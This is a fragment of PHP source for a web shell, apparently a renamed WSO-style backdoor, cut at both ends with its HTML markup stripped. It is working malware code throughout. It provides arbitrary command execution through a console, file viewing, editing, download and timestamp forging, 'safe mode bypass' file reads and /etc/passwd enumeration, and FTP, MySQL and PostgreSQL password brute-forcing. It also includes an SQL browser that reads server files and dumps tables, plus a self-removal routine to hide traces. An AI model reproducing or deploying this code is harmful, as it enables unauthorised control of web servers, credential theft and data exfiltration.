$b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "BOFFCmp");\r\n\tusort($dirs, "BOFFCmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "
NameSizeModifyOwner/GroupPermissionsActions
\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" title=\' . $f[\'link\'] . \'>[ \' . htmlspecialchars($f[\'name\']) . \' ]\').\'\'.(($f[\'type\']==\'file\')?BOFFViewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\']\r\n\t\t\t.\'R T\'.(($f[\'type\']==\'file\')?\' E D\':\'\').\'
\r\n\t\r\n\t\r\n\t\r\n\t ";\r\n if(!empty($_SESSION[\'act\']) && @count($_SESSION[\'f\']) && (($_SESSION[\'act\'] == \'zip\') || ($_SESSION[\'act\'] == \'tar\')))\r\n echo "file name:  ";\r\n echo ">\'>
";\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionStringTools() {\r\n\tif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\r\n\tif(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i \'base64_encode\',\r\n\t\t\'Base64 decode\' => \'base64_decode\',\r\n\t\t\'Url encode\' => \'urlencode\',\r\n\t\t\'Url decode\' => \'urldecode\',\r\n\t\t\'Full urlencode\' => \'full_urlencode\',\r\n\t\t\'md5 hash\' => \'md5\',\r\n\t\t\'sha1 hash\' => \'sha1\',\r\n\t\t\'crypt\' => \'crypt\',\r\n\t\t\'CRC32\' => \'crc32\',\r\n\t\t\'ASCII to HEX\' => \'ascii2hex\',\r\n\t\t\'HEX to ASCII\' => \'hex2ascii\',\r\n\t\t\'HEX to DEC\' => \'hexdec\',\r\n\t\t\'HEX to BIN\' => \'hex2bin\',\r\n\t\t\'DEC to HEX\' => \'dechex\',\r\n\t\t\'DEC to BIN\' => \'decbin\',\r\n\t\t\'BIN to HEX\' => \'binhex\',\r\n\t\t\'BIN to DEC\' => \'bindec\',\r\n\t\t\'String to lower case\' => \'strtolower\',\r\n\t\t\'String to upper case\' => \'strtoupper\',\r\n\t\t\'Htmlspecialchars\' => \'htmlspecialchars\',\r\n\t\t\'String length\' => \'strlen\',\r\n\t);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n\t\tob_start();\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))\r\n\t\t\techo $_POST[\'p1\']($_POST[\'p2\']);\r\n\t\t$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n\tBOFFHeader();\r\n\techo \'

String conversions

\';\r\n\tif(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n\techo "
>\'/> send using AJAX
";\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n\t}\r\n\techo"

Search text in files:

\r\n\t\t
\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t
Text:
Path:
Name:
>\'>
";\r\n\r\n\tfunction BOFFRecursiveGlob($path) {\r\n\t\tif(substr($path, -1) != \'/\')\r\n\t\t\t$path.=\'/\';\r\n\t\t$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\r\n\t\tif(is_array($paths)&&@count($paths)) {\r\n\t\t\tforeach($paths as $item) {\r\n\t\t\t\tif(@is_dir($item)){\r\n\t\t\t\t\tif($path!=$item)\r\n\t\t\t\t\t\tBOFFRecursiveGlob($item);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(@strpos(@file_get_contents($item), @$_POST[\'p2\'])!==false)\r\n\t\t\t\t\t\techo "".htmlspecialchars($item)."
";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(@$_POST[\'p3\'])\r\n\t\tBOFFRecursiveGlob($_POST[\'c\']);\r\n\techo "

Search for hash:

\r\n\t\t
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t
";\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tBOFFHeader();\r\n\techo \'

File tools

\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\tBOFFFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' Size: \'.(is_file($_POST[\'p1\'])?BOFFViewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.BOFFPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';\r\n\techo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \';\r\n\techo \'

\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'
\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'
\';\r\n\t\t\t\t$code = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'\'), array(\'\'),$code).\'
\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!
\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!
\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000
\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}\r\n\t\t\t\t\t$h[1] .= \'
\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!
\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'\');\r\n\t\t\t}\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'
\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionSafeMode() {\r\n\t$temp=\'\';\r\n\tob_start();\r\n\tswitch($_POST[\'p1\']) {\r\n\t\tcase 1:\r\n\t\t\t$temp=@tempnam($test, \'cx\');\r\n\t\t\tif(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){\r\n\t\t\t\techo @file_get_contents($temp);\r\n\t\t\t\tunlink($temp);\r\n\t\t\t} else\r\n\t\t\t\techo \'Sorry... Can\\\'t open file\';\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t$files = glob($_POST[\'p2\'].\'*\');\r\n\t\t\tif( is_array($files) )\r\n\t\t\t\tforeach ($files as $filename)\r\n\t\t\t\t\techo $filename."\\n";\r\n\t\t\tbreak;\r\n\t\tcase 3:\r\n\t\t\t$ch = curl_init("file://".$_POST[\'p2\']."\\x00".preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__));\r\n\t\t\tcurl_exec($ch);\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tini_restore("safe_mode");\r\n\t\t\tini_restore("open_basedir");\r\n\t\t\tinclude($_POST[\'p2\']);\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tfor(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n\t\t\t\t$uid = @posix_getpwuid($_POST[\'p2\']);\r\n\t\t\t\tif ($uid)\r\n\t\t\t\t\techo join(\':\',$uid)."\\n";\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t}\r\n\t$temp = ob_get_clean();\r\n\tBOFFHeader();\r\n\techo \'

Safe mode bypass

\';\r\n\techo \'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To
\';\r\n\tif($temp)\r\n\t\techo \'
\'.htmlspecialchars($temp).\'
\';\r\n\techo \'
\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = true;\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = false;\r\n\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".BOFFEx($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n\tBOFFHeader();\r\n echo "";\r\n\techo \'

Console

send using AJAX redirect stderr to stdout (2>&1)
$
\';\r\n\techo \'
\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionLogout() {\r\n session_destroy();\r\n\tdie(\'bye!\');\r\n}\r\n\r\nfunction actionSelfRemove() {\r\n\t\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n BOFFHeader();\r\n\techo \'

Suicide

Really want to remove the shell?
Yes
\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionBruteforce() {\r\n\tBOFFHeader();\r\n\tif( isset($_POST[\'proto\']) ) {\r\n\t\techo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\';\r\n\t\tif( $_POST[\'proto\'] == \'ftp\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$fp = @ftp_connect($ip, $port?$port:21);\r\n\t\t\t\tif(!$fp) return false;\r\n\t\t\t\t$res = @ftp_login($fp, $login, $pass);\r\n\t\t\t\t@ftp_close($fp);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'mysql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass);\r\n\t\t\t\t@mysql_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'pgsql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\r\n\t\t\t\t$res = @pg_connect($str);\r\n\t\t\t\t@pg_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t}\r\n\t\t$success = 0;\r\n\t\t$attempts = 0;\r\n\t\t$server = explode(":", $_POST[\'server\']);\r\n\t\tif($_POST[\'type\'] == 1) {\r\n\t\t\t$temp = @file(\'/etc/passwd\');\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = explode(":", $line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(@$_POST[\'reverse\']) {\r\n\t\t\t\t\t\t$tmp = "";\r\n\t\t\t\t\t\tfor($i=strlen($line[0])-1; $i>=0; --$i)\r\n\t\t\t\t\t\t\t$tmp .= $line[0][$i];\r\n\t\t\t\t\t\t++$attempts;\r\n\t\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\r\n\t\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\t\techo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t} elseif($_POST[\'type\'] == 2) {\r\n\t\t\t$temp = @file($_POST[\'dict\']);\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = trim($line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}\r\n\t\techo "Attempts: $attempts Success: $success

";\r\n\t}\r\n\techo \'

FTP bruteforce

\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'
Type
\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'Server:port
Brute type
\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'
Login
Dictionary
\'\r\n\t\t.\'
\';\r\n\techo \'

\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionSql() {\r\n\tclass DbClass {\r\n\t\tvar $type;\r\n\t\tvar $link;\r\n\t\tvar $res;\r\n\t\tfunction DbClass($type)\t{\r\n\t\t\t$this->type = $type;\r\n\t\t}\r\n\t\tfunction connect($host, $user, $pass, $dbname){\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$host = explode(\':\', $host);\r\n\t\t\t\t\tif(!$host[1]) $host[1]=5432;\r\n\t\t\t\t\tif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction selectdb($db) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif (@mysql_select_db($db))return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction query($str) {\r\n\t\t\tswitch($this->type) {\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = @mysql_query($str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = @pg_query($this->link,$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction fetch() {\r\n\t\t\t$res = func_num_args()?func_get_arg(0):$this->res;\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listDbs() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n return $this->query("SHOW databases");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listTables() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = $this->query(\'SHOW TABLES\');\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction error() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_error();\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_last_error();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction setCharset($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif(function_exists(\'mysql_set_charset\'))\r\n\t\t\t\t\t\treturn @mysql_set_charset($str, $this->link);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$this->query(\'SET CHARSET \'.$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_set_client_encoding($this->link, $str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction loadFile($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query("CREATE TABLE BOFF2(file text);COPY BOFF2 FROM \'".addslashes($str)."\';select file from BOFF2;");\r\n\t\t\t\t\t$r=array();\r\n\t\t\t\t\twhile($i=$this->fetch())\r\n\t\t\t\t\t\t$r[] = $i[\'file\'];\r\n\t\t\t\t\t$this->query(\'drop table BOFF2\');\r\n\t\t\t\t\treturn array(\'file\'=>implode("\\n",$r));\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction dump($table, $fp = false) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\t$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t$create = mysql_fetch_array($res);\r\n\t\t\t\t\t$sql = $create[1].";\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t$this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n $head = true;\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n if($v == null)\r\n $item[$k] = "NULL";\r\n elseif(is_numeric($v))\r\n $item[$k] = $v;\r\n else\r\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t}\r\n if($head) {\r\n $sql = \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\r\n $head = false;\r\n } else\r\n $sql = "\\n\\t,(".implode(", ", $item).\')\';\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n if(!$head)\r\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query(\'SELECT * FROM \'.$table);\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n\t\t\t\t\t\t\t$item[$k] = "\'".addslashes($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = $k;\r\n\t\t\t\t\t\t}\r\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t};\r\n\t$db = new DbClass($_POST[\'type\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\t$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n switch($_POST[\'charset\']) {\r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n case "cp866": $db->setCharset(\'cp866\'); break;\r\n }\r\n if(empty($_POST[\'file\'])) {\r\n ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment; filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v)\r\n\t\t\t\t$db->dump($v);\r\n exit;\r\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v, $fp);\r\n fclose($fp);\r\n unset($_POST[\'p2\']);\r\n } else\r\n die(\'\');\r\n\t}\r\n\tBOFFHeader();\r\n\techo "\r\n

Sql browser

\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\t\t\t\r\n \r\n\t\t\t\r\n\t\t
TypeHostLoginPasswordDatabase
